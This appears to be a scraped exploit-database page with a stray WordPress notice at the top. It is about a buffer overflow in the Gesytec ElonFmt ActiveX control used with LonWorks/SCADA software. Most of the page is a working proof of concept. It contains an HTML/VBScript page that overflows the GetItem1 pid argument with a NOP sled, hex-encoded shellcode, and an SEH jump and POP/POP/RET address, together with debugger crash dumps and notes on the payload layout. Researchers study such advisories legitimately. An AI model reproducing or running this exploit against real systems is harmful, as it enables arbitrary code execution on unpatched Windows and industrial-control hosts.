Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH) - exploit.company
header-logo
Suggest Exploit
vendor:
Unknown
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Unknown
Affected Version From: 1.1.14.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in elonfmt.ocx module, we get a few memory registers overwritten including the SEH. An attacker can gain access to the system on the affected node and execute arbitrary code.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!--


Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)


Vendor: Gesytec GmbH
Product web page: http://www.gesytec.de
Affected version: 1.1.14.1

Summary: Connects LonWorks networks to process control, visualization, SCADA
and office software.

Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow
vulnerability. When a large buffer is sent to the pid item of the GetItem1
function in elonfmt.ocx module, we get a few memory registers overwritten
including the SEH. We're dealing with a character translation. An attacker
can gain access to the system on the affected node and execute arbitrary code.


----------------------------------------------------------------------------------

(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
cccccccc ??              ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc      mov     ebx,0CCBBBBBBh
0013ecf5 cc              int     3
0013ecf6 cc              int     3
0013ecf7 cc              int     3
0013ecf8 dddd            fstp    st(5)
0013ecfa dddd            fstp    st(5)
0013ecfc dddd            fstp    st(5)
0013ecfe dddd            fstp    st(5)

...
...
...

0:000> d esp
0013eb58  01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00  .....aS.|Zc.....
0013eb68  88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf  ........$FS.....
0013eb78  a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89  .Zc..Zc.....`)S.
0013eb88  ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00  ....h...........
0013eb98  06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e  ..........st..C~
0013eba8  01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77  ........@.G....w
0013ebb8  1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00  .....V..........
0013ebc8  20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00   .c...c....w....
0:000> d
0013ebd8  64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c  d!.w....t..|Q|.|
0013ebe8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ebf8  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec08  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec18  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec28  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec38  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................
0013ec48  aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa  ................

...
...
...

0:000> d
0013ece8  aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc  ................
0013ecf8  dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01  ..............c.
0013ed08  00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00  ......c.........
0013ed18  82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00  ..........c.(...
0013ed28  00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73  ......c......C.s
0013ed38  5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10  \...............
0013ed48  80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01  ..c.$.V.....x.c.
0013ed58  48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00  H...............



----------------------------------------------------------------------------------


Tested on: Microsoft Windows XP Professional SP3 (EN)
           Easylon OPC Server M 2.30.66.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk

High five to sickn3ss!


Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php


09.04.2011


JUST A PoC MODEL:


-->



<html>
<object classid='clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC' id='zsl' />
<script language='VBScript'>

targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype  = "Function GetItem1 ( ByVal typeName As String ,  ByVal pid As String ,  ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid     = "ELONFMTLib.ElonFmt"
argCount   = 3

arg1="defaultV"

arg2 = String(10, "90") _
     + "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
     + "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
     + "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
     + "bdb04a0c921272dfe753b33d07016c4abab6190e" _
     + "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
     + "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
     + "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
     + "a072b7353756c341bc5904c0867d80895d1f9177" _
     + "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
     + "687cfa0bef8129681fc870d88895e059d525df9d" _
     + "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
     + "7edcd8" _
     + String(62, "A") + "eb069090" + "78c70110" _
     + "e9e0fdffff" + String(20, "D")

arg3=1

zsl.GetItem1 arg1 ,arg2 ,arg3



'
'Argument No.2 Structure:
'--------------------------------------------------------------------------------------------------------------
'
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'
'--------------------------------------------------------------------------------------------------------------
'
'
'
'Scenes (2/5)
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'
'           junk             nseh        seh(eip)        pad         eip
'
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'
'           junk             nseh        seh(eip)         random
'
'--------------------------------------------------------------------------------------------------------------
'


</script>
</html>

Navigation

Suggest Exploit

Services By CQR